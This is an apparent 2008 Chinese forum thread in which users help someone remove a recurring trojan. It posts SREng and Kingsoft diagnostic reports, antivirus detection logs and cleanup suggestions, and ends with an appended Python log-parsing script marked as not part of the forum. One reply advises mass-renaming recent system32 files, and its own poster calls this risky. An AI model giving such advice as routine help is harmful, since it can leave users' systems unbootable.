    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\qq2008\RICHED32.DLL]  [Microsoft Corporation, 5.00.2134.1]
    [D:\qq2008\RICHED20.dll]  [Microsoft Corporation, 5.31.23.1218]
    [D:\qq2008\QQAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrl.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrlRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQMainFrame.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\gdiplus.dll]  [Microsoft Corporation, 5.1.3102.3352 (xpsp_sp2_qfe.080415-1302)]
    [D:\qq2008\QQPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UnReadMsgMgr.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAllInOne.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\SCCore.dll]  [TENCENT, 1, 6, 0, 2]
    [D:\qq2008\CameraDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\FlashAvatarDll.dll]  [, 1, 0, 0, 1]
    [D:\qq2008\NewSkin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MailSummary.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSpace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\vbscript.dll]  [Microsoft Corporation, 5.6.0.7426]
    [E:\Kingsoft Internet Security 2008\Flash.OCX]  [Adobe Systems, Inc., 9,0,124,0]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\msdmo.dll]  [, ]
    [D:\qq2008\OEMApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAvatar.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQKnowledgeSearch.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQGroupMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQPet.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSysMsgMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UserDefinedHead.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQConfigPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQCustomFace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QRingMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LongConnection.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PhoneAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\DialerAllinOne.dll]  [tencent, 1, 4, 0, 0]
    [D:\qq2008\BQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CommercesMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PersonalDesktop.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAddr.dll]  [深圳市腾讯计算机系统有限公司, 5, 0, 101, 330]
    [D:\qq2008\QQSceneMng.dll]  [TENCENT, 8,0,978,1833]
[PID: 7228 / Administrator][D:\Downloads\sreng2\SREngLdr.EXE]  [Smallfrogs Studio, 2.6.12.1018]
[PID: 9064 / Administrator][D:\Downloads\sreng2\SRE9b4eb966.EXE]  [Smallfrogs Studio, 2.6.12.1018]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\Downloads\sreng2\Upload\3rdUpd.DLL]  [Smallfrogs Studio, 2, 1, 0, 15]
    [C:\PROGRA~1\MICROS~2\OFFICE11\MCPS.DLL]  [Microsoft Corporation, 11.0.8164]

==================================
文件关联
.TXT  Error. [C:\WINDOWS\notepad.exe %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  Error. ["hh.exe" %1]
.HLP  Error. [winhlp32.exe %1]
.INI  Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.JS   Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1       localhost

==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 732, C:\WINDOWS\SYSTEM32\WINLOGON.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2860, C:\WINDOWS\ALCFDRTM.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 7228, D:\DOWNLOADS\SRENG2\SRENGLDR.EXE]

==================================
API HOOK
N/A

==================================
隐藏进程
N/A

==================================

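Please open Cleanup Expert (清理专家) ---> Online System Diagnosis (在线系统诊断) ---> Export Diagnostic Report (导出诊断报告) ---> tick Select All (打钩全选) ---> Save Diagnostic Report (保存诊断报告)

Then upload the report to the forum.

Also check whether the following files exist:
Quote: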
C:\hxsydg.vbs
C:\rcbzlhh.exe

Thanks, sorry for the trouble.

==============================================================
        金山清理专家系统诊断报告

该诊断报告由金山清理专家提供 http://www.duba.net
==============================================================

诊断时间:            2008-09-21, 15:29
诊断平台:            Windows XP [5.1.2600] Service Pack 2
IE版本:              Internet Explorer V6.0.2180.2900
计算机物理内存:      1023(MB)
当前可用内存:        513(MB)
硬盘总大小:          146(GB)
硬盘可用空间:        34(GB)
清理专家版本:        2008.07.16.472
恶意软件库版本:      2008.08.06.1
漏洞库版本:          2008.09.02.1




==============================================================
        启动文件夹位置
==============================================================

Common Startup:      C:\Documents and Settings\All Users\「开始」菜单\程序\启动
Startup:             C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
Common Startup:      %ALLUSERSPROFILE%\「开始」菜单\程序\启动

==============================================================
        开始菜单启动项
==============================================================

<宽带连接.lnk>  <C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\宽带连接.lnk>
文件路径:  [残留信息]


==============================================================
        文件扩展名关联
==============================================================

.ASF            <"E:\暴风影院\Storm.exe" /play "%1">
文件路径: E:\暴风影院\Storm.exe [分析中]

.AVI            <"E:\暴风影院\Storm.exe" /play "%1">
文件路径: E:\暴风影院\Storm.exe [分析中]

.MPG(.MPEG)     <"E:\暴风影院\Storm.exe" /play "%1">
文件路径: E:\暴风影院\Storm.exe [分析中]


==============================================================
        Host File
==============================================================

127.0.0.1       localhost

==============================================================
        系统服务
==============================================================

该项来源: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

        [ccosm] [已启用]               <E:\暴风影院\stormliv.exe /asservice>
        文件路径: E:\暴风影院\stormliv.exe [分析中]


==============================================================
        当前进程
==============================================================

名称:     stormliv.exe  [已启用]
命令行:   E:\暴风影院\stormliv.exe /asservice
文件路径: E:\暴风影院\stormliv.exe  [分析中]                   (北京暴风网际科技有限公司)
模块文件: C:\WINDOWS\system32\ntdll.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\kernel32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\SHLWAPI.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\ADVAPI32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\RPCRT4.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\Secur32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\GDI32.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\USER32.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\msvcrt.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WS2_32.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WS2HELP.dll               (Microsoft Corporation)
模块文件: E:\暴风影院\MSVCP60.dll                           (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\MFC42.DLL                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\comdlg32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\COMCTL32.dll (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\SHELL32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\ole32.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\OLEAUT32.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\USERENV.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\VERSION.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\SETUPAPI.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WININET.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\CRYPT32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\MSASN1.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\IMM32.DLL                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\LPK.DLL                   (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\USP10.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\MFC42LOC.DLL              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\uxtheme.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\xpsp2res.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\mswsock.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\hnetcfg.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\System32\wshtcpip.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\CLBCATQ.DLL               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\COMRes.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\msxml3.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\DNSAPI.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\System32\winrnr.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WLDAP32.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\rasadhlp.dll              (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\netapi32.dll              (Microsoft Corporation)
模块文件: E:\暴风影院\bfoptdll.dll                          (北京暴风网际科技有限公司)
模块文件: C:\WINDOWS\system32\mlang.dll                 (Microsoft Corporation)
模块文件: E:\暴风影院\box\BoxLog.dll                        (北京暴风网际科技有限公司)
模块文件: C:\WINDOWS\system32\quartz.dll                (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\WINMM.dll                 (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\devenum.dll               (Microsoft Corporation)
模块文件: C:\WINDOWS\system32\cryptdll.dll              (Microsoft Corporation)


==============================================================
        其他安全区域
==============================================================

该项来源: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved

        [显示摇曳 CPL 扩展]         <deskpan.dll>

TOP

C:\rcbzlhh.exe has already been removed by Kingsoft.

TOP

After I renamed the two VBS files to TXT files, I was able to delete them.

TOP

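I don't see any problem in the Cleanup Expert diagnostic report.

Please upload the real-time file protection log.

Kingsoft Antivirus main program ---> Tools ---> Log Viewer ---> Real-time File Protection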

TOP

实时防毒(按时间降序排列)
病毒 2008-09-21 14:28:29 病毒在文件C:\rcbzlhh.exe中 Win32.Troj.XSeyT.vb.401408 处理成功(操作:删除)
信息 2008-09-21 14:03:33 KWatch3.SYS开始运行   
信息 2008-09-21 14:03:33 KAEngine初始化成功   
信息 2008-09-21 14:02:05 KWatch3.SYS初始化成功   
信息 2008-09-21 14:02:05 KWatch3.SYS开始加载   
信息 2008-09-21 14:02:05 KAVIPC开始运行   
信息 2008-09-21 14:02:05 KAVIPC初始化成功   
信息 2008-09-21 14:02:05 KAVIPC开始加载   
信息 2008-09-21 14:02:05 Windows Security Center初始化成功   
信息 2008-09-21 14:02:05 Restore-Module初始化成功   
信息 2008-09-21 14:02:05 Windows Logon Splash初始化成功   
信息 2008-09-21 14:02:05 金山毒霸文件实时防毒开始加载

TOP

How many times in total have alerts like this one appeared?

TOP

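This is the first time since I reinstalled yesterday, but this VBS and the virus have been around for 3 weeks now; they come back after I delete them. It started with an FTPPOPO trojan infection.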

TOP

Try sending it to virus.org for analysis~

TOP

What is virus.org? I'm a newbie, sorry, I don't understand. Sorry to trouble you.

TOP

Addendum

Another virus was just caught and removed:
病毒        2008-09-21 21:51:52        病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\GHI1K3M5\gx[1].jpg中        Win32.PSWTroj.OnLineGames.237568        处理成功(操作:删除)       
病毒        2008-09-21 21:50:31        病毒在文件C:\WINDOWS\system32\cc.exe中        Win32.PSWTroj.OnLineGames.237568        处理成功(操作:删除)

TOP

OP, how do you connect to the internet?

TOP

It looks like the OP got infected while browsing the web.
I suggest checking carefully under system32.

TOP

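The SREng log looks normal. Do you often visit the same fixed websites, for example by having your home page set to a fixed site? First empty the IE temporary files folder and the system temp folder, then try staying away from those sites and see whether the problem still occurs.
Use SREng to repair the file associations for: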
.TXT
.CHM
.HLP
.INI  
.VBS
.JS   

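The following operation carries risk, use it with caution:
Then, in the system32 folder, view all files by creation time and change the extension of the files from the day of the infection, for example .exe to .ex. That way, if something breaks after the change, it can be changed back quickly from DOS.
HijackThis log scan: http://bbs.kingsoft.com/viewthread.php?tid=326358&fpage=1
How to use it: http://www.xici.net/main.asp?doc=41593440
Trend Micro online scan (boot XP into Safe Mode with Networking): http://www.hcny.gov.cn/netres/netres.htm
Trend Micro small tools: ftp://ftp.trendmicro.com.cn/support/public
Solving common problems: http://www.hongsanhuan.com.cn/bbsnew/showtopic.asp?TOPIC_ID=159&Forum_ID=7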

TOP

The ftppopo trojan....
Refer to the fix I wrote up.
An SREng log can't fully resolve the problem.

TOP
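To answer the question raised in the thread of how many such alerts have appeared, the real-time protection lines posted above can be tallied mechanically. This is an added example, not part of any forum post or of Kingsoft's tooling; the line layout in the regex is inferred only from the lines shown in this thread, and the function names are hypothetical.

```python
import ntpath
import re
from collections import Counter
from datetime import datetime

# Detection and info lines copied from the log excerpts posted in this thread.
SAMPLE_LOG = r"""
病毒 2008-09-21 21:51:52 病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\GHI1K3M5\gx[1].jpg中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-21 21:50:31 病毒在文件C:\WINDOWS\system32\cc.exe中 Win32.PSWTroj.OnLineGames.237568 处理成功(操作:删除)
病毒 2008-09-21 14:28:29 病毒在文件C:\rcbzlhh.exe中 Win32.Troj.XSeyT.vb.401408 处理成功(操作:删除)
信息 2008-09-21 14:03:33 KWatch3.SYS开始运行
"""

# Assumed layout: type, timestamp, "病毒在文件<path>中", detection name, result.
# Fields may be separated by spaces or tabs, and the path itself may contain spaces.
DETECTION = re.compile(
    r"^病毒\s+(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"病毒在文件(?P<path>.+?)中\s+(?P<name>\S+)\s+(?P<result>\S+)\s*$"
)

def parse_detections(text):
    """Return one dict per detection line, oldest first; info lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = DETECTION.match(line.strip())
        if m:
            row = m.groupdict()
            row["ts"] = datetime.strptime(row["ts"], "%Y-%m-%d %H:%M:%S")
            rows.append(row)
    return sorted(rows, key=lambda r: r["ts"])

def summarize(rows):
    """Count alerts per detection name and per directory the file sat in."""
    by_name = Counter(r["name"] for r in rows)
    by_dir = Counter(ntpath.dirname(r["path"]) for r in rows)
    return by_name, by_dir

def recurring(rows):
    """Detection names seen more than once, with every path they were found at."""
    by_name, _ = summarize(rows)
    return {n: [r["path"] for r in rows if r["name"] == n]
            for n, c in by_name.items() if c > 1}

if __name__ == "__main__":
    found = parse_detections(SAMPLE_LOG)
    for name, paths in recurring(found).items():
        print(name, len(paths), paths)
```

A detection name that recurs across different directories, as one does here in the IE cache and in system32, is a reason to keep looking for whatever is writing the files rather than treating each deletion as the end of the incident.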